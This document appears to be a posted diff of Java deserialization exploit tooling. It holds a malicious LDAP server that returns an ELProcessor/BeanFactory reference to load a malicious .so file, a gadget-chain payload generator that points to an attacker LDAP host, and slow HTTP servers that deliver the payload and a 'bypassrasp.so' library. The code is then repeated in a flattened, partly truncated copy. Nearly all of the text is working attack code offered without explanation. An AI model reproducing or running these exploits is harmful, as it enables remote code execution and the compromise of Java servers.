to016 · December 3, 2023 05:58
diff --git a/evil_ldapServer.java b/evil_ldapServer.java
 import com.unboundid.ldap.listener.InMemoryDirectoryServer;
 import com.unboundid.ldap.listener.InMemoryDirectoryServerConfig;
 import com.unboundid.ldap.listener.InMemoryListenerConfig;
 import com.unboundid.ldap.listener.interceptor.InMemoryInterceptedSearchResult;
 import com.unboundid.ldap.listener.interceptor.InMemoryOperationInterceptor;
 import com.unboundid.ldap.sdk.Entry;
 import com.unboundid.ldap.sdk.LDAPException;
 import com.unboundid.ldap.sdk.LDAPResult;
 import com.unboundid.ldap.sdk.ResultCode;
 import org.apache.naming.ResourceRef;

 import javax.naming.StringRefAddr;
 import javax.net.ServerSocketFactory;
 import javax.net.SocketFactory;
 import javax.net.ssl.SSLSocketFactory;
 import java.io.ByteArrayOutputStream;
 import java.io.IOException;
 import java.io.ObjectOutputStream;
 import java.net.InetAddress;
 import java.net.MalformedURLException;
 import java.net.URL;

 public class EvilLdapServer {

    private static final String LDAP_BASE = "dc=example,dc=com";

    public static void main(String[] args) {
        int port = 1389;
        if ( args.length < 1 || args[ 0 ].indexOf('#') < 0 ) {
            System.err.println(EvilLdapServer.class.getSimpleName() + " <codebase_url#classname> [<port>]"); //$NON-NLS-1$
            System.exit(-1);
        }
        else if ( args.length > 1 ) {
            port = Integer.parseInt(args[ 1 ]);
        }

        try {
            InMemoryDirectoryServerConfig config = new InMemoryDirectoryServerConfig(LDAP_BASE);
            config.setListenerConfigs(new InMemoryListenerConfig(
                    "listen", //$NON-NLS-1$
                    InetAddress.getByName("0.0.0.0"), //$NON-NLS-1$
                    port,
                    ServerSocketFactory.getDefault(),
                    SocketFactory.getDefault(),
                    (SSLSocketFactory) SSLSocketFactory.getDefault()));

            config.addInMemoryOperationInterceptor(new OperationInterceptor(new URL(args[ 0 ])));
            InMemoryDirectoryServer ds = new InMemoryDirectoryServer(config);
            System.out.println("Listening on 0.0.0.0:" + port); //$NON-NLS-1$
            ds.startListening();

        }
        catch ( Exception e ) {
            e.printStackTrace();
        }

    }
    private static class OperationInterceptor extends InMemoryOperationInterceptor {

        private URL codebase;


        /**
         *
         */
        public OperationInterceptor ( URL cb ) {
            this.codebase = cb;
        }


        /**
         * {@inheritDoc}
         *
         * @see com.unboundid.ldap.listener.interceptor.InMemoryOperationInterceptor#processSearchResult(com.unboundid.ldap.listener.interceptor.InMemoryInterceptedSearchResult)
         */
        @Override
        public void processSearchResult ( InMemoryInterceptedSearchResult result ) {
            String base = result.getRequest().getBaseDN();
            Entry e = new Entry(base);
            try {
                sendResult(result, base, e);
            }
            catch ( Exception e1 ) {
                e1.printStackTrace();
            }

        }


        protected void sendResult ( InMemoryInterceptedSearchResult result, String base, Entry e ) throws LDAPException, IOException {
            e.addAttribute("javaClassName", "javax.el.ELProcessor");
            ResourceRef ref = new ResourceRef("javax.el.ELProcessor", null, "", "", true,"org.apache.naming.factory.BeanFactory",null);
            //redefine a setter name for the 'x' property from 'setX' to 'eval', see BeanFactory.getObjectInstance code
            ref.add(new StringRefAddr("forceString", "x=eval"));

            ref.add(new StringRefAddr("x", "\"\".getClass().forName(\"java.lang.System\").getMethod(\"load\", \"\".getClass()).invoke(null,\"/tmp/<temp_file_of_malicious_.so_file>\")"));

            ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
            ObjectOutputStream objectOutputStream = new ObjectOutputStream(byteArrayOutputStream);
            objectOutputStream.writeObject(ref);

            e.addAttribute("javaSerializedData", byteArrayOutputStream.toByteArray());
            result.sendSearchEntry(e);
            result.setResult(new LDAPResult(0, ResultCode.SUCCESS));
            System.out.println("Sent result");
        }

    }
 }
diff --git a/generate_payload.java b/generate_payload.java
 import com.fasterxml.jackson.databind.node.POJONode;
 import com.sun.org.apache.xpath.internal.objects.XString;
 import javassist.*;
 import ysoserial.payloads.util.Gadgets;
 import javax.media.jai.remote.SerializableRenderedImage;
 import javax.naming.CompositeName;
 import java.awt.*;
 import java.awt.image.BufferedImage;
 import java.io.*;
 import java.lang.reflect.*;

 import java.util.Base64;
 import java.util.HashMap;
 import java.util.zip.GZIPOutputStream;

 public class Main2 {
    public static void main(String[] args) {
        try {



            ClassPool classPool = new ClassPool(true);

            CtClass ctClass = classPool.get("com.fasterxml.jackson.databind.node.BaseJsonNode");
            CtMethod writeReplace = ctClass.getDeclaredMethod("writeReplace");
            ctClass.removeMethod(writeReplace);
            ctClass.toClass();
            String ldapCtxUrl = "ldap://192.168.169.1:9999/";
            Class ldapAttributeClazz = Class.forName("com.sun.jndi.ldap.LdapAttribute");
            Constructor ldapAttributeClazzConstructor = ldapAttributeClazz.getDeclaredConstructor(
                    new Class[] {String.class});
            ldapAttributeClazzConstructor.setAccessible(true);
            Object ldapAttribute = ldapAttributeClazzConstructor.newInstance(
                    new Object[] {"name"});
            Field baseCtxUrlField = ldapAttributeClazz.getDeclaredField("baseCtxURL");
            baseCtxUrlField.setAccessible(true);
            baseCtxUrlField.set(ldapAttribute, ldapCtxUrl);
            Field rdnField = ldapAttributeClazz.getDeclaredField("rdn");
            rdnField.setAccessible(true);
            rdnField.set(ldapAttribute, new CompositeName("a/b"));
            POJONode pojoNode = new POJONode(Gadgets.createTemplatesImpl(new String[]{"touch /tmp/to"}));
            XString xString = new XString("xxx");


            HashMap map1 = new HashMap();
            map1.put("to", pojoNode);
            map1.put("v1", xString);

            HashMap map2 = new HashMap();
            map2.put("to", xString);
            map2.put("v1", pojoNode);

            HashMap finalMap = makeMap(map1, map2);
            ByteArrayOutputStream byteArrayOutputStream1 = new ByteArrayOutputStream();
            ObjectOutputStream objectOutputStream1 = new ObjectOutputStream(byteArrayOutputStream1);
            objectOutputStream1.writeObject(finalMap);
            objectOutputStream1.close();
            String encodedPayloadCalc = Base64.getEncoder().encodeToString(byteArrayOutputStream1.toByteArray());


            // Create a sample RenderedImage
            int width = 300;
            int height = 200;
            BufferedImage bufferedImage = new BufferedImage(width, height, BufferedImage.TYPE_INT_RGB);
            Graphics2D g2d = bufferedImage.createGraphics();
            g2d.setColor(Color.WHITE);
            g2d.fillRect(0, 0, width, height);
            g2d.setColor(Color.RED);
            g2d.drawLine(0, 0, width, height);
            g2d.dispose();


            ClassPool classPool2 = ClassPool.getDefault();

            CtClass serializableRenderedImageClass = classPool2.get("javax.media.jai.remote.SerializableRenderedImage");

 
            CtMethod writeObjectMethod = serializableRenderedImageClass.getDeclaredMethod("writeObject");


            serializableRenderedImageClass.removeMethod(writeObjectMethod);


            CtMethod newWriteObjectMethod = CtNewMethod.make(
                    "private void writeObject(java.io.ObjectOutputStream out) throws java.io.IOException {\n" +
                            "        out.defaultWriteObject();\n" +
                            "        Object propertyTable = null;\n" +
                            "        out.writeObject(javax.media.jai.remote.SerializerFactory.getState(this.sampleModel, (java.awt.RenderingHints)null));\n" +
                            "        out.writeObject(javax.media.jai.remote.SerializerFactory.getState(this.colorModel, (java.awt.RenderingHints)null));\n" +
                            "        out.writeObject(propertyTable);" +
                            "        byte[] payloadBytes = java.util.Base64.getDecoder().decode(\""+ encodedPayloadCalc + "\".getBytes());" +
                            "        out.writeObject(payloadBytes);\n" +
                            "}",
                    serializableRenderedImageClass
            );


            serializableRenderedImageClass.addMethod(newWriteObjectMethod);


           serializableRenderedImageClass.toClass();


            SerializableRenderedImage serializableRenderedImage = new SerializableRenderedImage(bufferedImage);

            setFieldValue(serializableRenderedImage, "useDeepCopy", true);
            setFieldValue(serializableRenderedImage, "useTileCodec", true);
            setFieldValue(serializableRenderedImage, "formatName", "raw");



            FileOutputStream fos = new FileOutputStream("gzip_payload.bin");
            GZIPOutputStream gzipOS = new GZIPOutputStream(fos);
            ObjectOutputStream oos = new ObjectOutputStream(gzipOS);
            oos.writeObject(serializableRenderedImage);
            oos.close();



        } catch (Exception e) {
            e.printStackTrace();
        }


    }

    public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception {
        Field field = getField(obj.getClass(), fieldName);
        field.set(obj, value);
    }

    public static Field getField(Class<?> clazz, String fieldName) throws Exception {
        Field field = clazz.getDeclaredField(fieldName);
        if (field != null) {
            field.setAccessible(true);
        } else if (clazz.getSuperclass() != null) {
            field = getField(clazz.getSuperclass(), fieldName);
        }

        return field;
    }

    public static HashMap makeMap(Object v1, Object v2) throws Exception, ClassNotFoundException, NoSuchMethodException, InstantiationException, IllegalAccessException, InvocationTargetException {
        HashMap s = new HashMap();
        setFieldValue(s, "size", 2);

        Class nodeC;
        try {
            nodeC = Class.forName("java.util.HashMap$Node");
        } catch (ClassNotFoundException var6) {
            nodeC = Class.forName("java.util.HashMap$Entry");
        }

        Constructor nodeCons = nodeC.getDeclaredConstructor(Integer.TYPE, Object.class, Object.class, nodeC);
        nodeCons.setAccessible(true);
        Object tbl = Array.newInstance(nodeC, 2);
        Array.set(tbl, 0, nodeCons.newInstance(0, v1, v1, null));
        Array.set(tbl, 1, nodeCons.newInstance(0, v2, v2, null));
        setFieldValue(s, "table", tbl);
        return s;
    }

 }
diff --git a/slow_http_server1.py b/slow_http_server1.py
 from tornado.ioloop import IOLoop
 import tornado.web
 import time

 class MainHandler(tornado.web.RequestHandler):
    def get(self):

        with open("payload.bin","rb") as file:
            self.write(file.read())
            self.flush()
            time.sleep(99999)
            self.finish()

 if __name__ == "__main__":
    application =  tornado.web.Application([
        (r'/get_bin.zip', MainHandler),
    ])
    port = 8989
    application.listen(port)
    print("Listening on port "+str(port))
    IOLoop.instance().start()
diff --git a/slow_http_server2.py b/slow_http_server2.py
 from tornado.ioloop import IOLoop
 import tornado.web
 import time

 class MainHandler(tornado.web.RequestHandler):
    def get(self):

        with open("bypassrasp.so","rb") as file:
            self.write(file.read())
            self.flush()
            time.sleep(99999)
            self.finish()

 if __name__ == "__main__":
    application =  tornado.web.Application([
        (r'/get_so.zip', MainHandler),
    ])
    port = 8990
    application.listen(port)
    print("Listening on port "+str(port))
    IOLoop.instance().start()
	import com.unboundid.ldap.listener.InMemoryDirectoryServer;
	import com.unboundid.ldap.listener.InMemoryDirectoryServerConfig;
	import com.unboundid.ldap.listener.InMemoryListenerConfig;
	import com.unboundid.ldap.listener.interceptor.InMemoryInterceptedSearchResult;
	import com.unboundid.ldap.listener.interceptor.InMemoryOperationInterceptor;
	import com.unboundid.ldap.sdk.Entry;
	import com.unboundid.ldap.sdk.LDAPException;
	import com.unboundid.ldap.sdk.LDAPResult;
	import com.unboundid.ldap.sdk.ResultCode;
	import org.apache.naming.ResourceRef;

	import javax.naming.StringRefAddr;
	import javax.net.ServerSocketFactory;
	import javax.net.SocketFactory;
	import javax.net.ssl.SSLSocketFactory;
	import java.io.ByteArrayOutputStream;
	import java.io.IOException;
	import java.io.ObjectOutputStream;
	import java.net.InetAddress;
	import java.net.MalformedURLException;
	import java.net.URL;

	public class EvilLdapServer {

	private static final String LDAP_BASE = "dc=example,dc=com";

	public static void main(String[] args) {
	int port = 1389;
	if ( args.length < 1 \|\| args[ 0 ].indexOf('#') < 0 ) {
	System.err.println(EvilLdapServer.class.getSimpleName() + " <codebase_url#classname> [<port>]"); //$NON-NLS-1$
	System.exit(-1);
	}
	else if ( args.length > 1 ) {
	port = Integer.parseInt(args[ 1 ]);
	}

	try {
	InMemoryDirectoryServerConfig config = new InMemoryDirectoryServerConfig(LDAP_BASE);
	config.setListenerConfigs(new InMemoryListenerConfig(
	"listen", //$NON-NLS-1$
	InetAddress.getByName("0.0.0.0"), //$NON-NLS-1$
	port,
	ServerSocketFactory.getDefault(),
	SocketFactory.getDefault(),
	(SSLSocketFactory) SSLSocketFactory.getDefault()));

	config.addInMemoryOperationInterceptor(new OperationInterceptor(new URL(args[ 0 ])));
	InMemoryDirectoryServer ds = new InMemoryDirectoryServer(config);
	System.out.println("Listening on 0.0.0.0:" + port); //$NON-NLS-1$
	ds.startListening();

	}
	catch ( Exception e ) {
	e.printStackTrace();
	}

	}
	private static class OperationInterceptor extends InMemoryOperationInterceptor {

	private URL codebase;


	/**
	*
	*/
	public OperationInterceptor ( URL cb ) {
	this.codebase = cb;
	}


	/**
	* {@inheritDoc}
	*
	* @see com.unboundid.ldap.listener.interceptor.InMemoryOperationInterceptor#processSearchResult(com.unboundid.ldap.listener.interceptor.InMemoryInterceptedSearchResult)
	*/
	@Override
	public void processSearchResult ( InMemoryInterceptedSearchResult result ) {
	String base = result.getRequest().getBaseDN();
	Entry e = new Entry(base);
	try {
	sendResult(result, base, e);
	}
	catch ( Exception e1 ) {
	e1.printStackTrace();
	}

	}


	protected void sendResult ( InMemoryInterceptedSearchResult result, String base, Entry e ) throws LDAPException, IOException {
	e.addAttribute("javaClassName", "javax.el.ELProcessor");
	ResourceRef ref = new ResourceRef("javax.el.ELProcessor", null, "", "", true,"org.apache.naming.factory.BeanFactory",null);
	//redefine a setter name for the 'x' property from 'setX' to 'eval', see BeanFactory.getObjectInstance code
	ref.add(new StringRefAddr("forceString", "x=eval"));

	ref.add(new StringRefAddr("x", "\"\".getClass().forName(\"java.lang.System\").getMethod(\"load\", \"\".getClass()).invoke(null,\"/tmp/<temp_file_of_malicious_.so_file>\")"));

	ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
	ObjectOutputStream objectOutputStream = new ObjectOutputStream(byteArrayOutputStream);
	objectOutputStream.writeObject(ref);

	e.addAttribute("javaSerializedData", byteArrayOutputStream.toByteArray());
	result.sendSearchEntry(e);
	result.setResult(new LDAPResult(0, ResultCode.SUCCESS));
	System.out.println("Sent result");
	}

	}
	}
	import com.fasterxml.jackson.databind.node.POJONode;
	import com.sun.org.apache.xpath.internal.objects.XString;
	import javassist.*;
	import ysoserial.payloads.util.Gadgets;
	import javax.media.jai.remote.SerializableRenderedImage;
	import javax.naming.CompositeName;
	import java.awt.*;
	import java.awt.image.BufferedImage;
	import java.io.*;
	import java.lang.reflect.*;

	import java.util.Base64;
	import java.util.HashMap;
	import java.util.zip.GZIPOutputStream;

	public class Main2 {
	public static void main(String[] args) {
	try {



	ClassPool classPool = new ClassPool(true);

	CtClass ctClass = classPool.get("com.fasterxml.jackson.databind.node.BaseJsonNode");
	CtMethod writeReplace = ctClass.getDeclaredMethod("writeReplace");
	ctClass.removeMethod(writeReplace);
	ctClass.toClass();
	String ldapCtxUrl = "ldap://192.168.169.1:9999/";
	Class ldapAttributeClazz = Class.forName("com.sun.jndi.ldap.LdapAttribute");
	Constructor ldapAttributeClazzConstructor = ldapAttributeClazz.getDeclaredConstructor(
	new Class[] {String.class});
	ldapAttributeClazzConstructor.setAccessible(true);
	Object ldapAttribute = ldapAttributeClazzConstructor.newInstance(
	new Object[] {"name"});
	Field baseCtxUrlField = ldapAttributeClazz.getDeclaredField("baseCtxURL");
	baseCtxUrlField.setAccessible(true);
	baseCtxUrlField.set(ldapAttribute, ldapCtxUrl);
	Field rdnField = ldapAttributeClazz.getDeclaredField("rdn");
	rdnField.setAccessible(true);
	rdnField.set(ldapAttribute, new CompositeName("a/b"));
	POJONode pojoNode = new POJONode(Gadgets.createTemplatesImpl(new String[]{"touch /tmp/to"}));
	XString xString = new XString("xxx");


	HashMap map1 = new HashMap();
	map1.put("to", pojoNode);
	map1.put("v1", xString);

	HashMap map2 = new HashMap();
	map2.put("to", xString);
	map2.put("v1", pojoNode);

	HashMap finalMap = makeMap(map1, map2);
	ByteArrayOutputStream byteArrayOutputStream1 = new ByteArrayOutputStream();
	ObjectOutputStream objectOutputStream1 = new ObjectOutputStream(byteArrayOutputStream1);
	objectOutputStream1.writeObject(finalMap);
	objectOutputStream1.close();
	String encodedPayloadCalc = Base64.getEncoder().encodeToString(byteArrayOutputStream1.toByteArray());


	// Create a sample RenderedImage
	int width = 300;
	int height = 200;
	BufferedImage bufferedImage = new BufferedImage(width, height, BufferedImage.TYPE_INT_RGB);
	Graphics2D g2d = bufferedImage.createGraphics();
	g2d.setColor(Color.WHITE);
	g2d.fillRect(0, 0, width, height);
	g2d.setColor(Color.RED);
	g2d.drawLine(0, 0, width, height);
	g2d.dispose();


	ClassPool classPool2 = ClassPool.getDefault();

	CtClass serializableRenderedImageClass = classPool2.get("javax.media.jai.remote.SerializableRenderedImage");


	CtMethod writeObjectMethod = serializableRenderedImageClass.getDeclaredMethod("writeObject");


	serializableRenderedImageClass.removeMethod(writeObjectMethod);


	CtMethod newWriteObjectMethod = CtNewMethod.make(
	"private void writeObject(java.io.ObjectOutputStream out) throws java.io.IOException {\n" +
	" out.defaultWriteObject();\n" +
	" Object propertyTable = null;\n" +
	" out.writeObject(javax.media.jai.remote.SerializerFactory.getState(this.sampleModel, (java.awt.RenderingHints)null));\n" +
	" out.writeObject(javax.media.jai.remote.SerializerFactory.getState(this.colorModel, (java.awt.RenderingHints)null));\n" +
	" out.writeObject(propertyTable);" +
	" byte[] payloadBytes = java.util.Base64.getDecoder().decode(\""+ encodedPayloadCalc + "\".getBytes());" +
	" out.writeObject(payloadBytes);\n" +
	"}",
	serializableRenderedImageClass
	);


	serializableRenderedImageClass.addMethod(newWriteObjectMethod);


	serializableRenderedImageClass.toClass();


	SerializableRenderedImage serializableRenderedImage = new SerializableRenderedImage(bufferedImage);

	setFieldValue(serializableRenderedImage, "useDeepCopy", true);
	setFieldValue(serializableRenderedImage, "useTileCodec", true);
	setFieldValue(serializableRenderedImage, "formatName", "raw");



	FileOutputStream fos = new FileOutputStream("gzip_payload.bin");
	GZIPOutputStream gzipOS = new GZIPOutputStream(fos);
	ObjectOutputStream oos = new ObjectOutputStream(gzipOS);
	oos.writeObject(serializableRenderedImage);
	oos.close();



	} catch (Exception e) {
	e.printStackTrace();
	}


	}

	public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception {
	Field field = getField(obj.getClass(), fieldName);
	field.set(obj, value);
	}

	public static Field getField(Class<?> clazz, String fieldName) throws Exception {
	Field field = clazz.getDeclaredField(fieldName);
	if (field != null) {
	field.setAccessible(true);
	} else if (clazz.getSuperclass() != null) {
	field = getField(clazz.getSuperclass(), fieldName);
	}

	return field;
	}

	public static HashMap makeMap(Object v1, Object v2) throws Exception, ClassNotFoundException, NoSuchMethodException, InstantiationException, IllegalAccessException, InvocationTargetException {
	HashMap s = new HashMap();
	setFieldValue(s, "size", 2);

	Class nodeC;
	try {
	nodeC = Class.forName("java.util.HashMap$Node");
	} catch (ClassNotFoundException var6) {
	nodeC = Class.forName("java.util.HashMap$Entry");
	}

	Constructor nodeCons = nodeC.getDeclaredConstructor(Integer.TYPE, Object.class, Object.class, nodeC);
	nodeCons.setAccessible(true);
	Object tbl = Array.newInstance(nodeC, 2);
	Array.set(tbl, 0, nodeCons.newInstance(0, v1, v1, null));
	Array.set(tbl, 1, nodeCons.newInstance(0, v2, v2, null));
	setFieldValue(s, "table", tbl);
	return s;
	}

	}
	from tornado.ioloop import IOLoop
	import tornado.web
	import time

	class MainHandler(tornado.web.RequestHandler):
	def get(self):

	with open("payload.bin","rb") as file:
	self.write(file.read())
	self.flush()
	time.sleep(99999)
	self.finish()

	if __name__ == "__main__":
	application = tornado.web.Application([
	(r'/get_bin.zip', MainHandler),
	])
	port = 8989
	application.listen(port)
	print("Listening on port "+str(port))
	IOLoop.instance().start()